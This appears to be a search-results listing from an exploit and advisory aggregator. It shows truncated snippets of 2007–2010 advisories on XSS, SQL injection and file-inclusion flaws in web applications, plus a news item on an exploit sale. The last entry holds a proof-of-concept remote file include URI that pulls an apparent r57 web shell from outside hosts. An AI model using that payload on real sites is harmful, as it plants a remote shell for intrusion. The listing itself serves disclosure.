264 matches found
WordPress Plugin Gigya Socialize 1.01.1.x - Cross-Site Scripting
source: https://www.securityfocus.com/bid/40582/info The Gigya Socialize Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this...
ImpressPages CMS 1.0.4 SQL Injection
Vulnerability ID: HTB22386 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityinimpresspagescms2.html Product: ImpressPages CMS Vendor: Apro Media Vulnerable Version: 1.0.4 and Probably Prior Versions Vendor Notification: 12 May 2010 Vulnerability Type: SQL Injection Status: Fixe...
SQL injection vulnerability in 360 Web Manager
Vulnerability ID: HTB22379 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityin360webmanager1.html Product: 360 Web Manager Vendor: 360 Web Manager Vulnerable Version: 3.0 Vendor Notification: 10 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed, Vendor Alerted,...
360 Web Manager 3.0 Cross Site Scripting
Vulnerability ID: HTB22377 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityin360webmanager.html Product: 360 Web Manager Vendor: 360 Web Manager Vulnerable Version: 3.0 Vendor Notification: 10 May 2010 Vulnerability Type: XSS Cross Site Scripting Status: Not Fixed, Vendor Alerted,...
Ruubik CMS 1.0.3 Cross Site Scripting
Vulnerability ID: HTB22380 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinruubikcms.html Product: RuubikCMS Vendor: Piuha Vulnerable Version: 1.0.3 and Probably Prior Versions Vendor Notification: 10 May 2010 Vulnerability Type: XSS Cross Site Scripting Status: Not Fixed, Vendor...
LiSK CMS 4.4 edit_email.php SQL Injection
Vulnerability ID: HTB22373 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityinliskcms1.html Product: LiSK CMS Vendor: Createch-group Vulnerable Version: 4.4 Vendor Notification: 06 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed, Vendor Alerted, Awaiting Vendor...
ecoCMS Cross Site Scripting
Vulnerability ID: HTB22353 Reference: http://www.htbridge.ch/advisory/xssinecocms.html Product: ecoCMS Vendor: ecoCMS Team Vulnerable Version: Current at 18.04.2010 and Probably Prior Versions Vendor Notification: 18 April 2010 Vulnerability Type: XSS Cross Site Scripting Status: Not Fixed, Vendo...
browsers Crash Exploit (Mozilla Firefox/Internet Explorer/Google Chrome/Netscape/Opera)
No description provided by source. @Title: All browsers 0day Crash Exploit @Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/ - @Exploit for all browsers Tested on: Mozilla Firefox // Internet Explorer // Google Chrome // Netscape // Opera: body...
Pligg CMS 1.1.2 (status) Parameter SQL Injection Vulnerability
Exploit for php platform in category web applications Pligg CMS 'status' Parameter SQL Injection Vulnerability Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could...
Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
Madirish Webmail is prone to multiple vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow th...
TJX Browser Exploit Accomplice Gets Probation
A computer security professional who sold Internet Explorer exploit code to credit card hacker Albert Gonzalez was sentenced Tuesday to three years probation and a $10,000 fine. Jeremy Jethro, 29, was paid $60,000 by Gonzalez for a zero-day exploit against Microsoft’s browser, “the purpose and...
Softbiz Jobs - 'sbad_type' Cross-Site Scripting
source: https://www.securityfocus.com/bid/38383/info Softbiz Jobs is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context ...
Winamp 5.57 (Browser) IE Denial of Service Exploit
No description provided by source. Winamp 5.57 Browser IE Denial of Service Exploit Homepage: http://www.winamp.com/ Exploit Coded by: cr4wl3r cr4wl3r\x40linuxmail\x2Eorg From: Indonesia Tested Win xpsp2 Greet...
Microsoft Agent Crafted URL Stack Buffer Overflow (MS07-051; CVE-2007-3040)
The Microsoft Agent ActiveX control exposes a set of methods and properties that can be used for scripting in HTML pages. A buffer overflow vulnerability exists in the Microsoft Windows Agent application. The flaw is due to incorrectly copying an overly large string to a fixed-size stack buffer...
DigitalHive - 'mt' Cross-Site Scripting
source: https://www.securityfocus.com/bid/37697/info DigitalHive is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context o...
Java vulnerabilities just to be on the attack code then we to-vulnerability warning-the black bar safety net
Using the Java virtual machine if you have not installed the Sun for Mac OS X, Windows, Linux with the latest security update, now will be a make up for the fault of timing. A security researcher local time on Thursday released a derived from the Mac OS X Java Runtime Environment vulnerability...
Joomla! Component com_mygallery - 'cid' SQL Injection
Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla com_mygallery 0 The 'com_mygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied...
Joomla! 'com_mygallery' Component 'cid' Parameter SQL Injection Vulnerability
No description provided by source. Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla com_mygallery 0 The 'com_mygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to...
Article Directory Index.PHP Remote File Include Vulnerability
Article Directory Index.PHP Remote File Include Vulnerability. Webapps exploit for php platform An attacker can exploit this issue via a browser. The following proof-of-concept URI is available:...
Article Directory Index.PHP Remote File Include Vulnerability
No description provided by source. An attacker can exploit this issue via a browser. The following proof-of-concept URI is available: http://www.example.com/index.php?page=http://www.example2.com/r57.txt?http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirotr0x/r57.txt?...